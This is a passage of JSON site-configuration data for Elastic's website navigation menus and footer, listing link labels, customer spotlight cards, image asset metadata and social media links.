Labs","_metadata":{"uid":"cs922d2c431301758e"},"url":"https://www.elastic.co/observability-labs"}],"_metadata":{"uid":"csd9188663d72fdd62"}}}],"created_at":"2023-06-04T12:03:24.813Z","created_by":"blt3e52848e0cb3c394","sanity_migration_complete":false,"style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Solutions - Observability","title_l10n":"","updated_at":"2024-12-02T09:38:00.463Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"time":"2024-12-02T09:38:05.590Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]}],"dropdown_footer":{"title_l10n":"","cards":[]}},{"title_l10n":"Customers","_metadata":{"uid":"cs02fc8bc99a63871c"},"title_id":"nav-item-customers","url":"","sections":[{"title_l10n":"Customers - By solution and by industry","_metadata":{"uid":"cs37e49237bd8c8b6a"},"background_style":null,"reference":[{"_content_type_uid":"site_navigation_reference","uid":"blt8a06ade8f3124e88","title":"Customers - By solution","column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"bltacc5e178e52f430e","ACL":{},"content_type":"image/svg+xml","created_at":"2023-06-04T17:40:11.179Z","created_by":"blt3e52848e0cb3c394","file_size":"2499","filename":"icon-checkmark-decorative-border.svg","parent_uid":null,"tags":[],"title":"icon-checkmark-decorative-border.svg","updated_at":"2023-06-04T17:40:11.179Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:34:54.206Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltacc5e178e52f430e/647ccc7b6be35fb5eabd2100/icon-checkmark-decorative-border.svg"},"_metadata":{"uid":"cs4dd1fca9f5f44f70"},"alt_text_l10n":""}},{"title":{"title_l10n":"By solution","_metadata":{"uid":"cs5da14c808687a24e"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eSee how customers search, solve, and succeed — all on one Search AI Platform.\u003c/p\u003e","_metadata":{"uid":"cs232ddd0cf2230d2d"}}},{"sublinks":{"sublinks":[{"title_l10n":"Search","_metadata":{"uid":"cs5b14b1b43ac9d8c6"},"url":"/customers/success-stories?usecase=enterprise-search\u0026industry=All"},{"title_l10n":"Security","_metadata":{"uid":"csc5d7c70d48ca90ae"},"url":"/customers/success-stories?usecase=security-analytics\u0026industry=All"},{"title_l10n":"Observability","_metadata":{"uid":"cse86ef1e2be61f194"},"url":"/customers/success-stories?usecase=elastic-observability\u0026industry=All"}],"_metadata":{"uid":"cs24cb1db1f15de1c4"}}}],"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"All customer stories","_metadata":{"uid":"cs0ce277db9b7e5ae7"},"url":"/customers","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs165f459ec9fb4aa5"},"footnote_l10n":""}}],"tags":[],"locale":"en-us","style":{"type":"Illustration Grid - two column"},"title_l10n":"","created_by":"blt3e52848e0cb3c394","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-06-04T12:02:51.393Z","updated_at":"2024-05-10T23:00:02.210Z","ACL":{},"_version":9,"publish_details":{"time":"2024-05-15T12:50:42.894Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"site_navigation_reference","_version":3,"locale":"en-us","uid":"blt1d401e05c1cb52ce","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Industries overview","_metadata":{"uid":"cs11ae98a64026023e"},"url":"/industries","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"csa93a1ad9dbde01ba"},"footnote_l10n":""}}],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"blt9f634b6f74878698","ACL":{},"content_type":"image/svg+xml","created_at":"2023-06-04T17:39:46.794Z","created_by":"blt3e52848e0cb3c394","file_size":"1595","filename":"icon-briefcase.svg","parent_uid":null,"tags":[],"title":"icon-briefcase.svg","updated_at":"2023-06-04T17:39:46.794Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:36:29.443Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9f634b6f74878698/647ccc625637890f19859454/icon-briefcase.svg"},"_metadata":{"uid":"cs8466139a3eb018b6"},"alt_text_l10n":""}},{"title":{"title_l10n":"Industries","_metadata":{"uid":"cs15073e3c310d94e5"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eExceed customer expectations and go to market faster.\u003c/p\u003e","_metadata":{"uid":"csd8f00d1e3c8e0ed4"}}},{"sublinks":{"sublinks":[{"title_l10n":"Public sector","_metadata":{"uid":"cs51ef52ec6b54b410"},"url":"/industries/public-sector"},{"title_l10n":"Financial services","_metadata":{"uid":"cs22eff93153cc2fbe"},"url":"/industries/financial-services"},{"title_l10n":"Telecommunications","_metadata":{"uid":"csacac8855fc00c0f8"},"url":"/industries/telecommunications"},{"title_l10n":"Retail","_metadata":{"uid":"csa363462a65d751a1"},"url":"/industries/retail-ecommerce"},{"title_l10n":"Manufacturing","_metadata":{"uid":"cs38a6bfd8d2f6022e"},"url":"/industries/manufacturing"}],"_metadata":{"uid":"cs9983d6253e2017aa"}}}],"created_at":"2024-05-10T22:59:23.362Z","created_by":"blt3044324473ef223b70bc674c","style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Customers - Industries","title_l10n":"","updated_at":"2024-05-15T18:10:31.550Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-05-15T18:11:29.679Z","user":"blt3044324473ef223b70bc674c"}}]},{"title_l10n":"Customer spotlight","_metadata":{"uid":"csb4ca6ac5082711d7"},"background_style":"Gray","reference":[{"_content_type_uid":"site_navigation_reference","uid":"bltf4eeed992c6383a2","_version":15,"locale":"en-us","ACL":{},"below_column_modular_blocks":[],"column_modular_blocks":[{"title":{"title_l10n":"Customer spotlight","_metadata":{"uid":"cs69b04a73066109e4"},"url":""}},{"card":{"type":null,"image":{"type":"thumbnail-128","file":{"_version":1,"is_dir":false,"uid":"blt652fec920f2b1a14","ACL":{},"content_type":"image/svg+xml","created_at":"2023-09-21T10:40:07.365Z","created_by":"blt3e52848e0cb3c394","file_size":"64960","filename":"logo-nav-dropdown-48x48-cisco.svg","parent_uid":null,"tags":[],"title":"logo-nav-dropdown-48x48-cisco.svg","updated_at":"2023-09-21T10:40:07.365Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-09-29T17:10:07.068Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt652fec920f2b1a14/650c1d87aa86c13fa1cc288c/logo-nav-dropdown-48x48-cisco.svg"},"alt_text_l10n":"Cisco logo"},"_metadata":{"uid":"cs5f973141d5cc1738"},"title_l10n":"","paragraph_l10n":"\u003cp\u003eCisco saves 5,000 support engineer hours per month\u003c/p\u003e","cta":[{"title_l10n":"Read more","_metadata":{"uid":"csf06d2489c4bd37ef"},"url":"/customers/cisco"}]}},{"card":{"type":null,"image":{"type":"thumbnail-128","file":{"uid":"blte788c0f923f209a3","_version":1,"title":"logo-dropdown-48x48-sitecore.svg","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2024-07-08T20:20:05.367Z","updated_at":"2024-07-08T20:20:05.367Z","content_type":"image/svg+xml","file_size":"4873","filename":"logo-dropdown-48x48-sitecore.svg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-07-08T20:21:17.641Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte788c0f923f209a3/668c49f5534bb913eb26e9e8/logo-dropdown-48x48-sitecore.svg"},"alt_text_l10n":"Sitecore logo"},"_metadata":{"uid":"csa2a078ccf29d695e"},"title_l10n":"","paragraph_l10n":"\u003cp\u003eSitecore automates 96 percent of security workflows with Elastic\u003c/p\u003e","cta":[{"title_l10n":"Read more","_metadata":{"uid":"csd53cb4b361d76ca2"},"url":"/customers/sitecore-security"}]}},{"card":{"type":null,"image":{"type":"thumbnail-128","file":{"_version":1,"is_dir":false,"uid":"blt90a52ed02808cbc1","ACL":{},"content_type":"image/svg+xml","created_at":"2023-09-21T10:40:45.741Z","created_by":"blt3e52848e0cb3c394","file_size":"47721","filename":"logo-nav-dropdown-48x48-comcast.svg","parent_uid":null,"tags":[],"title":"logo-nav-dropdown-48x48-comcast.svg","updated_at":"2023-09-21T10:40:45.741Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-09-29T17:10:28.064Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt90a52ed02808cbc1/650c1dadb25642d90add1e4e/logo-nav-dropdown-48x48-comcast.svg"},"alt_text_l10n":"Comcast logo"},"_metadata":{"uid":"csc9c0ac125da0e92b"},"title_l10n":"","paragraph_l10n":"\u003cp\u003eComcast transforms customer experiences with Elastic Observability\u003c/p\u003e","cta":[{"title_l10n":"Read more","_metadata":{"uid":"csada0ee69c800d1e2"},"url":"/customers/comcast"}]}}],"created_at":"2023-06-04T17:04:44.752Z","created_by":"blt3e52848e0cb3c394","style":{"type":"Customer spotlight"},"tags":[],"title":"Customers - Customer spotlight","title_l10n":"Customer Spotlight","updated_at":"2024-07-08T21:10:17.479Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-07-08T21:10:20.899Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]}],"dropdown_footer":{"title_l10n":"","cards":[]}},{"title_l10n":"Resources","_metadata":{"uid":"cs6d6faf906902f3c2"},"title_id":"nav-item-resources","url":"","sections":[{"title_l10n":"Research, Build, Learn, Connect","_metadata":{"uid":"csac521faabda66147"},"background_style":null,"reference":[{"_content_type_uid":"site_navigation_reference","uid":"blt2da6064728802db5","_version":3,"locale":"en-us","ACL":{},"below_column_modular_blocks":[],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"blt96bf0c70d7851e7d","ACL":{},"content_type":"image/svg+xml","created_at":"2023-07-18T17:36:03.382Z","created_by":"blt36e890d06c5ec32c","file_size":"1939","filename":"icon-code-self-closing.svg","parent_uid":null,"tags":[],"title":"icon-code-self-closing.svg","updated_at":"2023-07-18T17:36:03.382Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:35:38.133Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg"},"_metadata":{"uid":"cse8a0cd9936682cef"},"alt_text_l10n":""}},{"title":{"title_l10n":"Research","_metadata":{"uid":"cscb627b8efa82cba0"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eStay at the forefront of innovation with technical tips from the experts.\u003c/p\u003e","_metadata":{"uid":"csddfb11d93d95bad7"}}},{"sublinks":{"sublinks":[{"title_l10n":"Search Labs","_metadata":{"uid":"cs58dba67e336edf8b"},"url":"https://www.elastic.co/search-labs"},{"title_l10n":"Security Labs","_metadata":{"uid":"csffc4aa7973e5ffba"},"url":"https://www.elastic.co/security-labs"},{"title_l10n":"Observability Labs","_metadata":{"uid":"cs5a301cabb223025d"},"url":"https://www.elastic.co/observability-labs"}],"_metadata":{"uid":"cs1ac1fdfa36126b2f"}}}],"created_at":"2024-05-10T23:09:27.197Z","created_by":"blt3044324473ef223b70bc674c","sanity_migration_complete":false,"style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Resources - Research","title_l10n":"","updated_at":"2024-12-02T09:41:27.963Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"time":"2024-12-02T09:41:32.349Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"site_navigation_reference","uid":"blt74484ccc1b85172f","title":"Resources - Build","style":{"type":"Illustration Grid - two column"},"title_l10n":"","column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"blt96bf0c70d7851e7d","ACL":{},"content_type":"image/svg+xml","created_at":"2023-07-18T17:36:03.382Z","created_by":"blt36e890d06c5ec32c","file_size":"1939","filename":"icon-code-self-closing.svg","parent_uid":null,"tags":[],"title":"icon-code-self-closing.svg","updated_at":"2023-07-18T17:36:03.382Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:35:38.133Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg"},"_metadata":{"uid":"cs44c67d7b9a7d1650"},"alt_text_l10n":""}},{"title":{"title_l10n":"Build","_metadata":{"uid":"cse60ed914d4f01062"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eCode with other developers to create a better Elastic, together.\u003c/p\u003e","_metadata":{"uid":"csc56a3cd59fe094f5"}}},{"sublinks":{"sublinks":[{"title_l10n":"Community","url":"/community","_metadata":{"uid":"csd88d4c1cd46edc5d"}},{"title_l10n":"Forum","url":"https://discuss.elastic.co","_metadata":{"uid":"csb90d3bb62af3a70b"}},{"title_l10n":"Downloads","url":"/downloads","_metadata":{"uid":"cs7d47f2c7085e8b89"}},{"title_l10n":"Documentation","url":"/guide","_metadata":{"uid":"csd9f5895ad4598f70"}}],"_metadata":{"uid":"cs0ac4399ed28c210f"}}}],"below_column_modular_blocks":[],"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2024-05-10T23:10:45.764Z","updated_at":"2024-05-10T23:10:45.764Z","ACL":{},"_version":1,"publish_details":{"time":"2024-05-15T12:50:42.957Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"site_navigation_reference","uid":"blt934060d9e8d39d63","title":"Resources - Learn","title_l10n":"","column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"blt96bf0c70d7851e7d","ACL":{},"content_type":"image/svg+xml","created_at":"2023-07-18T17:36:03.382Z","created_by":"blt36e890d06c5ec32c","file_size":"1939","filename":"icon-code-self-closing.svg","parent_uid":null,"tags":[],"title":"icon-code-self-closing.svg","updated_at":"2023-07-18T17:36:03.382Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:35:38.133Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg"},"_metadata":{"uid":"cs5ed8e58e5dfaca72"},"alt_text_l10n":""}},{"title":{"title_l10n":"Learn","_metadata":{"uid":"cs019e09cee63b6044"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eUnleash the possibilities of your data and grow your skill set.\u003c/p\u003e","_metadata":{"uid":"cs2dd1ed4ed0245fb1"}}},{"sublinks":{"sublinks":[{"title_l10n":"Getting started","_metadata":{"uid":"csfc9cb80c881cd24a"},"url":"/getting-started"},{"title_l10n":"Elastic resources","_metadata":{"uid":"cs397c877c7fb56827"},"url":"/learn"},{"title_l10n":"Consulting services","_metadata":{"uid":"csbfa8b33d458721f6"},"url":"/consulting"},{"title_l10n":"Trainings \u0026 certifications","_metadata":{"uid":"csd9ec8c412f31120a"},"url":"/training"}],"_metadata":{"uid":"cs9cc31abd8fb24ad8"}}}],"below_column_modular_blocks":[],"tags":[],"locale":"en-us","style":{"type":"Illustration Grid - two column"},"created_by":"blt3e52848e0cb3c394","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-06-04T12:01:35.685Z","updated_at":"2024-05-10T23:12:02.296Z","ACL":{},"_version":8,"publish_details":{"time":"2024-05-15T12:50:43.025Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"site_navigation_reference","uid":"blt845ebfe78aed4d5e","title":"Resources - Connect/Have questions","style":{"type":"Illustration Grid - two column"},"title_l10n":"","column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":1,"is_dir":false,"uid":"blt96bf0c70d7851e7d","ACL":{},"content_type":"image/svg+xml","created_at":"2023-07-18T17:36:03.382Z","created_by":"blt36e890d06c5ec32c","file_size":"1939","filename":"icon-code-self-closing.svg","parent_uid":null,"tags":[],"title":"icon-code-self-closing.svg","updated_at":"2023-07-18T17:36:03.382Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-09T17:35:38.133Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg"},"_metadata":{"uid":"cse56c42201943cd81"},"alt_text_l10n":""}},{"title":{"title_l10n":"Connect","_metadata":{"uid":"cs06fc73baa9cc0e3a"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eKeep informed about the latest tech and news from Elastic.\u003c/p\u003e","_metadata":{"uid":"cs6b31c90db1e2a16c"}}},{"sublinks":{"sublinks":[{"title_l10n":"Blog","_metadata":{"uid":"csf3d7822d155dba5f"},"url":"/blog"},{"title_l10n":"Events","_metadata":{"uid":"csb66cf41564a89c85"},"url":"/events"}],"_metadata":{"uid":"cs1fef3e4e9c6dbed8"}}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"cse01f8ca7bd6510d5"}}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eHave questions?\u003c/p\u003e","_metadata":{"uid":"cs5a829b57a618798d"}}},{"sublinks":{"sublinks":[{"title_l10n":"Contact sales","_metadata":{"uid":"cs96d4362517c2285c"},"url":"/contact?storm=global-header-en"},{"title_l10n":"Get support","_metadata":{"uid":"cs7aa5c4baaaef5c7d"},"url":"/support"}],"_metadata":{"uid":"cs04b8e73b8815803a"}}}],"below_column_modular_blocks":[],"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2024-05-10T23:18:50.596Z","updated_at":"2024-05-14T02:49:41.602Z","ACL":{},"_version":5,"publish_details":{"time":"2024-05-15T12:50:42.982Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]}],"dropdown_footer":{"title_l10n":"","cards":[]}},{"title_l10n":"Pricing","_metadata":{"uid":"csaf6025f268634b11"},"title_id":"nav-item-pricing","url":"/pricing","sections":[],"dropdown_footer":{"title_l10n":"","cards":[]}},{"title_l10n":"Docs","_metadata":{"uid":"cs4989d0473c51cc69"},"title_id":"nav-item-docs","url":"https://www.elastic.co/docs","sections":[],"dropdown_footer":{"title_l10n":"","cards":[]}}],"tags":[],"title":"Site Navigation","updated_at":"2024-08-14T18:26:51.120Z","updated_by":"blt3044324473ef223b70bc674c","url":"/","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-14T18:27:02.197Z","user":"blt3044324473ef223b70bc674c"}}],1],"footer":{"uid":"blt269f572cdb5d93d5","_version":29,"locale":"en-us","ACL":{},"bottom_nav":[{"assigned_to_column":"1","title_l10n":"About us","_metadata":{"uid":"cs6cd917a10b9de1ff"},"url":"","sub_nav":[{"title_l10n":"About Elastic","_metadata":{"uid":"cs57853e838eec1fb4"},"url":"/about/","label":""},{"title_l10n":"Leadership","_metadata":{"uid":"cs7b59ceb017ff22bd"},"url":"/about/leadership","label":""},{"title_l10n":"DE\u0026I","_metadata":{"uid":"csb0b86d236613965f"},"url":"/careers/diversity-and-inclusion","label":""},{"title_l10n":"Blog","_metadata":{"uid":"cs3246df6b3f8161fe"},"url":"/blog","label":""},{"title_l10n":"Newsroom","_metadata":{"uid":"cs3d227dcae1bb8384"},"url":"/about/press","label":""}],"title2_l10n":"","url2":"","sub_nav2":[]},{"assigned_to_column":"1","title_l10n":"Join us","_metadata":{"uid":"cs4d22a4582aebc90c"},"url":"","sub_nav":[{"title_l10n":"Careers","_metadata":{"uid":"csca2cc3d07a6b7d36"},"url":"/careers","label":""},{"title_l10n":"Career portal","_metadata":{"uid":"cs53d10ad225a44f28"},"url":"https://jobs.elastic.co/#/","label":""},{"title_l10n":"How we hire","url":"/careers/how-we-hire","label":"","_metadata":{"uid":"cs832de86dbf975c63"}}],"title2_l10n":"","url2":"","sub_nav2":[]},{"assigned_to_column":"2","title_l10n":"Partners","_metadata":{"uid":"cs5fef14456079028c"},"url":"","sub_nav":[{"title_l10n":"Find a partner","_metadata":{"uid":"cse2fd098c7efded04"},"url":"https://partners.elastic.co/findapartner/","label":""},{"title_l10n":"Partner login","_metadata":{"uid":"cs95528fa33120b654"},"url":"https://login.elastic.co/login/partner","label":""},{"title_l10n":"Request access","_metadata":{"uid":"cs30282070e0411be1"},"url":"https://partners.elastic.co/English/register_email.aspx","label":""},{"title_l10n":"Become a partner","_metadata":{"uid":"cs0792dcf8683f5042"},"url":"/partners/become-a-partner","label":""}],"title2_l10n":"","url2":"","sub_nav2":[]},{"assigned_to_column":"2","title_l10n":"Trust \u0026 Security","_metadata":{"uid":"cs676bf9d92ab4cab2"},"url":"","sub_nav":[{"title_l10n":"Trust center","_metadata":{"uid":"cs0e067ac5cdb67f07"},"url":"/trust","label":""},{"title_l10n":"EthicsPoint portal","_metadata":{"uid":"csa5a6f1f0f4ad6561"},"url":"https://secure.ethicspoint.com/domain/media/en/gui/74447/index.html","label":""},{"title_l10n":"ECCN report","_metadata":{"uid":"cs10977a5ef048e0ee"},"url":"/trust/business-integrity#international-trade-compliance—eccn-information","label":""},{"title_l10n":"Ethics email","_metadata":{"uid":"cs3e9bd0524b74e154"},"url":"mailto:ethics@elastic.co","label":""}],"title2_l10n":"","url2":"","sub_nav2":[]},{"assigned_to_column":"3","title_l10n":"Investor relations","_metadata":{"uid":"cs12f93a5521bcc919"},"url":"","sub_nav":[{"title_l10n":"Investor resources","_metadata":{"uid":"cs0f53f841a7406963"},"url":"https://ir.elastic.co/home/default.aspx","label":""},{"title_l10n":"Governance","_metadata":{"uid":"cs372c8a459d030d80"},"url":"https://ir.elastic.co/governance/corporate-governance/default.aspx","label":""},{"title_l10n":"Financials","_metadata":{"uid":"cs44c6147db9c45464"},"url":"https://ir.elastic.co/financials/quarterly-results/default.aspx","label":""},{"title_l10n":"Stock","_metadata":{"uid":"csdceab8cb42b2e8e6"},"url":"https://ir.elastic.co/stock/stock-quote/default.aspx","label":""}],"title2_l10n":"","url2":"","sub_nav2":[]},{"assigned_to_column":"3","title_l10n":"Excellence Awards","_metadata":{"uid":"csef48ff6cc0c8017f"},"url":"","sub_nav":[{"title_l10n":"Previous winners","_metadata":{"uid":"cs0033483bf17111bb"},"url":"/blog/2022-elastic-excellence-awards-winners","label":""},{"title_l10n":"ElasticON Tour","_metadata":{"uid":"csd7af0a9be8c75c8c"},"url":"/elasticon","label":""},{"title_l10n":"Become a sponsor","_metadata":{"uid":"cse46c08157caa313e"},"url":"/events/sponsor","label":""},{"title_l10n":"All events","_metadata":{"uid":"csa8aadaa647b40c37"},"url":"/events/","label":""}],"title2_l10n":"","url2":"","sub_nav2":[]}],"copyright_l10n":"\u003cp\u003e© \u003cspan class=\"copyright-year\"\u003e\u003c/span\u003e. Elasticsearch B.V. All Rights Reserved\u003c/p\u003e","created_at":"2023-07-12T17:40:07.721Z","created_by":"blt36e890d06c5ec32c","footnote_l10n":"\u003cp\u003eElastic, Elasticsearch and other related marks are trademarks, logos or registered trademarks of Elasticsearch B.V. in the United States and other countries.\u003c/p\u003e\u003cp\u003eApache, Apache Lucene, Apache Hadoop, Hadoop, HDFS and the yellow elephant logo are trademarks of the \u003ca href=\"https://www.apache.org/\"\u003eApache Software Foundation\u003c/a\u003e in the United States and/or other countries. All other brand names, product names, or trademarks belong to their respective owners.\u003c/p\u003e","legal_links":[{"title_l10n":"Trademarks","_metadata":{"uid":"csc3a92ddcd1567637"},"url":"/legal/trademarks"},{"title_l10n":"Terms of Use","_metadata":{"uid":"cs244688727f583112"},"url":"/legal/terms-of-use"},{"title_l10n":"Privacy","_metadata":{"uid":"cs227108640c2a1b4b"},"url":"/legal/privacy-statement"},{"title_l10n":"Sitemap","_metadata":{"uid":"cs01d3fe43dedf205c"},"url":"/sitemap"}],"logo":{"uid":"bltf8467a95eaa27e4a","_version":1,"created_by":"blt27204bf9f7abb7fd","updated_by":"blt27204bf9f7abb7fd","created_at":"2024-05-06T13:15:06.525Z","updated_at":"2024-05-06T13:15:06.525Z","content_type":"image/svg+xml","file_size":"18710","filename":"logo-tagline_secondary_all_white-177.svg","title":"logo-tagline_secondary_all_white-177.svg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-05-06T14:16:52.270Z","user":"blt27204bf9f7abb7fd","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf8467a95eaa27e4a/6638d7da0d02e4e98155aaa3/logo-tagline_secondary_all_white-177.svg"},"sanity_migration_complete":false,"social_media_label_l10n":"Follow us","social_media_links":[{"title_l10n":"LinkedIn","_metadata":{"uid":"cs8281b766eac50225"},"url":"https://www.linkedin.com/company/elastic-co","image":{"uid":"blte7cfb1a091901ce1","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2019-06-26T13:41:34.613Z","updated_at":"2020-05-04T12:37:38.030Z","content_type":"image/svg+xml","file_size":"1528","filename":"footer-icon-linkedin.svg","title":"footer-icon-linkedin.svg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-05-05T11:51:40.866Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte7cfb1a091901ce1/5eb00c925751b2150e57a9d6/footer-icon-linkedin.svg"},"hover_icon":null,"tracking_id":"footer_linkedin"},{"title_l10n":"YouTube","_metadata":{"uid":"cs0a7ef0f38baa3dc4"},"url":"https://www.youtube.com/user/elasticsearch","image":{"uid":"blt7c28b18be98b1af8","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2019-06-26T13:41:59.474Z","updated_at":"2020-05-04T12:38:01.471Z","content_type":"image/svg+xml","file_size":"1890","filename":"footer-icon-youtube.svg","title":"footer-icon-youtube.svg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-05-05T11:51:40.866Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7c28b18be98b1af8/5eb00ca908d37e6d82ef7655/footer-icon-youtube.svg"},"hover_icon":null,"tracking_id":"footer_youtube"},{"title_l10n":"Facebook","_metadata":{"uid":"csbe2c2f5c606f8c8d"},"url":"https://www.facebook.com/elastic.co","image":{"uid":"blt75566c5278ad68da","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2019-06-26T13:41:02.511Z","updated_at":"2020-05-04T12:36:41.395Z","content_type":"image/svg+xml","file_size":"1143","filename":"footer-icon-facebook.svg","title":"footer-icon-facebook.svg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-05-05T11:51:40.866Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt75566c5278ad68da/5eb00c59d238e314f259fbea/footer-icon-facebook.svg"},"hover_icon":null,"tracking_id":"footer_facebook"},{"title_l10n":"Twitter","_metadata":{"uid":"csac0b218be6f14543"},"url":"https://www.twitter.com/elastic","image":{"uid":"blt341fed86979a9fbb","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2019-06-26T13:41:18.715Z","updated_at":"2020-05-04T12:37:10.251Z","content_type":"image/svg+xml","file_size":"2572","filename":"footer-icon-twitter.svg","title":"footer-icon-twitter.svg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-05-05T11:51:40.866Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt341fed86979a9fbb/5eb00c76b8a6356e4ddc1180/footer-icon-twitter.svg"},"hover_icon":null,"tracking_id":"footer_twitter"},{"title_l10n":"GitHub","_metadata":{"uid":"cs3f871c12d50cb1c4"},"url":"https://github.com/elastic","image":{"_version":1,"is_dir":false,"uid":"